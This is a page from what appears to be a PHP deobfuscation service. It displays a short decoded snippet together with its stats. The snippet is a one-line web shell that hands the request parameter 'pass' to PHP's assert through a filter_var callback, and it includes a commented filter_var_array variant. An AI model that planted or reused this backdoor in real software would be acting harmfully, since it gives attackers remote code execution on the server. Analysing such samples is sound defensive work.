Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert')); //fi..

Decoded Output download

<?php 
filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert')); 
//filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert'))); 
?> 

Did this file decode correctly?

Original Code

<?php
filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));
//filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));
?>

Function Calls

None

Variables

None

Stats

MD5 e600dd7883ee23bf3335af221f61631e
Eval Count 0
Decode Time 105 ms